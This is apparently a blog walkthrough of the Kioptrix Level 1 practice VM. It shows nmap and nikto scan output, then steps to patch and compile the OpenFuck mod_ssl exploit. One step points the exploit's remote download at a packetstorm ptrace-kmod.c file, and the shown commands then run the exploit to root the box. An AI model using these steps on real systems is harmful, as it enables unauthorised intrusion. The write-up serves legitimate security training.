Kioptrix Level 1 Hacking Challenge Walkthrough

Next Story

Defeating Tr0ll - Infosec Challenge Walkthrough

This is a walkthrough for Kioptrix Level 1. Although getting root on this box is pretty straightforward it’s a great place for those looking to get their feet wet when it comes to boot2root VM’s. I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with it’s list of vulnerabilities.The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/

Footprinting:

After loading up the VM I used netdiscover -r to find it’s IP address which was 192.168.2.90

Scanning:

Now it’s time to use Nmap to grab info about what ports and services are available.

[email protected]:~# nmap -sV -P0 -A 192.168.2.90

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for 192.168.2.90
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 – 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.2.90

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds

The first thing I noticed is that most of these services are pretty out dated which is good news. The second thing that grabs my attention is the version of Apache that is being run. There are clearly several different services running that may provide a foothold into the box but I decided to stick with Apache since it caught my eye. I fire up Iceweasel and find a default looking Apache page running on the webserver. Now to run Nikto to see what kind of information it can gather about the webserver.

Enumeration:

[email protected]:~# nikto -h 192.168.2.90
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.2.90
+ Target Hostname: 192.168.2.90
+ Target Port: 80
+ Start Time: 2014-08-13 11:44:28 (GMT-4)
—————————————————————————
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with ‘Forbidden’ for users, ‘not found’ for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 – Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 – Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 – Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra ‘/’ to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting…
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2014-08-13 11:44:53 (GMT-4) (25 seconds)
—————————————————————————
+ 1 host(s) tested

Gaining Access:

Ok so the first thing that Nikto returns is

+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

I do a simple Google search to see if there are any obvious exploits that fit my needs.

Well the first result seems to fit the bill quite well. Now I’m going to use searchsploit to see if I’ve already got this exploit.

[email protected]:~# searchsploit apache openssl
Description Path
————————————————————- ———————————-
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c

Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.

Ok so the very first section gives us what we need.

/*
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

If you try to compile this without changing the code you'll end up with a bunch of errors and issues.

badcompile

Luckily the paulsec write up is very straight forward. So here are the changes I made.

Here are the steps I used to get this to compile in VI.
1) Add these two headers:
#include
#include

2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Install the libssl-dev library if you don't have it already:

apt-get install libssl-dev

4) Update the declaration of variables:
Search for
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
To compile:
gcc -o exploit 764.c -lcrypto
goodcompile

So the exploit compiled without any issues this time. Now it’s time to move in for the kill.

[email protected]:/tmp/exploit# ./exploit | grep -i redhat | grep “1.3.20”

grepexploit

This shows me that I’ve got two options for this exploit so I first try the 0x6a but it doesn’t quite work out.

1stattempt

So I try the 2nd which is 0x6b and decide to add a range of 40 connections for a better shot at getting this to work.

2ndattempt

And there it is. Root access on Kioptrix Level 1. Feel free to leave feedback and questions in the comments.

Leave a Reply